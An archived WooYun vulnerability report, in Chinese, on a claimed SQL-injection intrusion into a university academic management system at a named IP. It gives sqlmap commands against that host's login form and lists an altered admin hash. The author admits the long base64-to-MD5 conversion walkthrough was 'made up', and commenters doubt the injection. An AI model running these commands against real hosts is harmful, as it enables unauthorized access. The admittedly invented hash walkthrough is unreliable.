当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086601

漏洞标题:湖北经济学院商法学院教务管理系统入侵

相关厂商:湖北经济学院

漏洞作者: 路人甲

提交时间:2014-12-10 11:50

修复时间:2014-12-15 11:52

公开时间:2014-12-15 11:52

漏洞类型:成功的入侵事件

危害等级:中

自评Rank:7

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-10: 细节已通知厂商并且等待厂商处理中
2014-12-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

可获得注入获得最高权限管理员账号

详细说明:

首先做了和正方的字典 然后倒入御剑开始扫扫敏感信息
218.197.80.9

EIB7AKM%R5J48OA45C1@Z66.jpg


感觉是权限设置有点问题 敏感文件真不少
然后感觉这个页面是可以注入的http://218.197.80.9/login.html
使用sqlmap 进行post注入 这个注入很简单 但是很耗时间
注入语法
Post登陆框注入:
./sqlmap.py -r *.txt -p tfUPass
sqlmap -u http://218.197.80.9 --forms
sqlmap -u url "tfUName=1(可为任意数)&tfUPass=1(可为任意数)"
谁便以这种都可以我就使用sqlmap -u http://218.197.80.9 --forms自动收索了因为简单呵呵!

接下来就是长规指令很无聊 而且因为时间太长 就不重复了
正方的管理和老师的表名是yhb 乌云上知道的 感谢乌云的学习平台
接下来注入得到管理账号和md5
jwc01 {MD5}a1VWdNt5nYbW7SBamrAr4w== md5我改掉了两位 为了防止别人拿去乱搞
接下来问题来了 这是个22位的md5
来看看怎么解这种md5谁便找个22位md5为例
下面就走个流程, 看看怎么把E5Ia47UWnXs19vyWWsjKbg还原成出来:
先列个东西, 等会要用:
00 A 16 Q 32 g 48 w
01 B 17 R 33 h 49 x
02 C 18 S 34 i 50 y
03 D 19 T 35 j 51 z
04 E 20 U 36 k 52 0
05 F 21 V 37 l 53 1
06 G 22 W 38 m 54 2
07 H 23 X 39 n 55 3
08 I 24 Y 40 o 56 4
09 J 25 Z 41 p 57 5
10 K 26 a 42 q 58 6
11 L 27 b 43 r 59 7
12 M 28 c 44 s 60 8
13 N 29 d 45 t 61 9
14 O 30 e 46 u 62 +
15 P 31 f 47 v 63 /
复制代码
① 把E5Ia47UWnXs19vyWWsjKbg根据上面的表还原出来数值: 04 57 08 26 56 59 20 22 39 23 44 53 61 47 50 22
② 把04 57 08 26 56 59 20 22 39 23 44 53 61 47 50 22转成Bin值:
04 00000100
57 00111001
08 00001000
26 00011010
56 00111000
59 00111011
20 00010100
22 00010110
39 00100111
23 00010111
44 00101100
53 00110101
61 00111101
47 00101111
50 00110010
22 00010110
22 00010110
44 00101100
35 00100011
10 00001010
27 00011011
32 00100000
③ 一共有22个, 前21个把开头的00去掉, 最后一个除了去掉开头的00还要去掉末尾的0000得到这个:
00010011 10010010 00011010 11100011 10110101 00010110 10011101 01111011 00110101 11110110 11111100 10010110 01011010 11001000 11001010 01101110
复制代码
④ 把Bin转换成Hex:
00010011 13
10010010 92
00011010 1A
11100011 E3
10110101 B5
00010110 16
10011101 9D
01111011 7B
00110101 35
11110110 F6
11111100 FC
10010110 96
01011010 5A
11001000 C8
11001010 CA
01101110 6E
复制代码
⑤ 最后得到: 13921AE3B5169D7B35F6FC965AC8CA6E
这个够眼熟了吧? 32位的自己反查吧...
其实我不懂, 上面都是我瞎编的, 实在编不下去了;
P.S. 这种MD5(d_Base64)的方式在asp.net的Membership中自带了;
方法一样 就这样

漏洞证明:

为可证明漏洞冒死等了下管理的号

Q(Q@E01ZG1)}`@M)EM8UARC.jpg


不知道为什么前几个都没过 管理好人给个好

修复方案:

过滤 正确设置权限

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-15 11:52

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2014-12-15 23:35 | sin ( 实习白帽子 | Rank:38 漏洞数:2 | 寻找最优雅的解决方案)

    小伙子,你的想法很危险呐...貌似不通用额你在习科看的这个22位md5转换吧....前端时间刚好批量转换+md5api机密这个...稍微看了下.习科上面的那位给出的其实有点瑕疵....

  2. 2014-12-15 23:43 | sin ( 实习白帽子 | Rank:38 漏洞数:2 | 寻找最优雅的解决方案)

    另外你到底是什么注入的?老版本确实挺多注入,但这个应该md5后的版本应该不容易吧....注入纯静态html....欲盖弥彰???

  3. 2015-02-27 00:11 | wellsun ( 路人 | Rank:0 漏洞数:1 | www.wellsun.com)

    @sin 其实我跟你的想法一样.再加上,login.html 递交的表单也不是 tfUName 跟 tfpass..

  4. 2015-03-20 21:08 | xbuther ( 路人 | Rank:4 漏洞数:3 | 多多交流,一起进步。。。O(∩_∩)O~)

    注入纯静态html 楼主好666